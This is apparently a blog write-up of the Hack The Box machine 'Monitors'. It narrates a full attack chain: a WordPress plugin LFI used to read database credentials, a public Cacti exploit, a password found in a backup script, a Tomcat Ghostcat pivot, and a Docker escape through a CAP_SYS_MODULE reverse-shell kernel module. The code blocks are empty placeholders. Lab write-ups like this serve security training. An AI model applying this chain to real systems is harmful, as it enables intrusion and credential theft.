ūüĒéūü¶∂Enumeration/Foothold

Monitors is an Hard box from HTB and created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI and an internal docker with Apache Tomcat running. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. Running¬†RustScan¬†with¬†NMAP¬†filters shows a website available on¬†Port 80. The website states ‘Sorry, direct IP access is not allowed’ but provides an admin contact detail.

admin@monitors.htb email address.

[email protected] email address.

I edit my host file and add in monitors.htb.

Copy

Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.

Running out of date WordPress.

Copy

Well the scan is running I notice that wp-with-spritz has been detected and its last update was 2015.

wp-with-spritz coming up as 2015 being the last update.

wp-with-spritz coming up as 2015 being the last update.

A short search later shows me an entry from ExploitDB Р44544 which shows an LFI/RFI available for the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) exploit to pull the WP-Config file. WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner then the static viewing.

WP-Config file running in source.

wp-config.cfg file running in source.

I try the credentials to login to the WordPress admin but it doesn’t work. I check around a few locations for the next point of escalation. I review NMAP¬†and realize the machine is running¬†Apache/2.4.29. I navigate to the¬†000-default.conf¬†to see if the page we saw earlier can give us any additional information or if any other hosts exists.

Running Apache/2.4.29

Running Apache/2.4.29

An additional VHOST is available.

An additional VHOST is available.

I add the new host in my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in the WP-Config file and log in. It took me a second as I needed to use admin for the username and not wpadmin.

 

I navigate around the console looking for a file upload or script option. Next I check the version which is located at the top right of the page.

Cacti 1.2.12

Cacti 1.2.12

ūüĒĚEscalation

This leads me to ExploitDB Р49810 which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving my a low privilege shell.

‚ö† Attack Machine (Tab 1)

Copy
ExploitDB - 49810 running successfully.

ExploitDB – 49810 running successfully.

‚ö† Attack Machine (Tab 2)

Copy

After getting onto the machine and upgrading my shell I tried to use curl or WGET to pull files to the box and was unable to do so as they were both not installed. Using nc I pulled Linenum to the box.

ūüéĮVictim Machine

Copy

‚ö† Attack Machine

Copy

Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus who I was trying to escalate too had a .backup directory.

.backup directory in Marcus' home directory.

.backup directory in Marcus’ home directory and

cacti-backup.service running on the machine.

cacti-backup.service running on the machine.

Reviewing the cacti-backup.service I can see that the .backup folder m entioned earlier has a shell script inside the directory. Trying to view it gives me his credentials. I su to his account, grab the flag and try ssh.

cacti-backup.service showing a backup script running in .backup

cacti-backup.service showing a backup script running in .backup

Password for Marcus in backup.sh

and the password for Marcus in backup.sh

I login with¬†SSH¬†and read the note –

Copy

This must be a clue to how I progress. I check services running looking for a docker installation. I notice¬†Port 8443¬†open which wasn’t visible on the original scan. I use¬†SSH¬†to forward the port to my local host.

Port 8443 open on the local host.

Port 8443 open on the local host.

Copy
Apache Tomcat/9.0.31 running on the localhost.

Apache Tomcat/9.0.31 running on the local host.

Viewing the page does not give me the exploit I was hoping for but I do notice Apache Tomcat/9.0.31 running which I know is constantly being exploited. A short Google late shows me that a Metasploit module is available.

Apache Tomcat/9.0.31 running on the localhost.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit

Copy

The first I ran the exploit it errored and told me to use ForceExploit to override. Doing this allowed me to get a meterpeter shell.

ForceExploit command used due to local host pivot.

ForceExploit command used due to local host pivot

After running the exploit I could see I was root of the docker environment. I knew next steps were to escape and escalate. I found this article on hacktricks, hacktricks – Docker Breakout.

Copy

Inside the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link lead me to a second article focused full on CAP_SYS_MODULE hacktricks -CAP_SYS_MODDULE. Truthfully this part can be confusing so just follow the article as best you can.

ūüéĮVictim Machine

Copy

‚ö† Attack Machine

Use the copy command (on the website) to copy reverse-shell.c and Makefile. After the reverse-shell.c on Line 8 and put in your own IP/Port. Make sure when copying the Makefile you tab the blank char before each word. When done launch a web server and pull both files to the machine.

Copy

ūüďú Makefile

Copy

ūüďú reverse-shell.c

Copy

After we run reverse-shell.ko on the docker VM our reverse shell pops and we are root.

Root on Monitors from HTB.

Root on Monitors from HTB.

Copy

Rooted

Published On: October 9th, 2021 / Categories: HTB, Technology / Tags: , , , , , , , /

Leave A Comment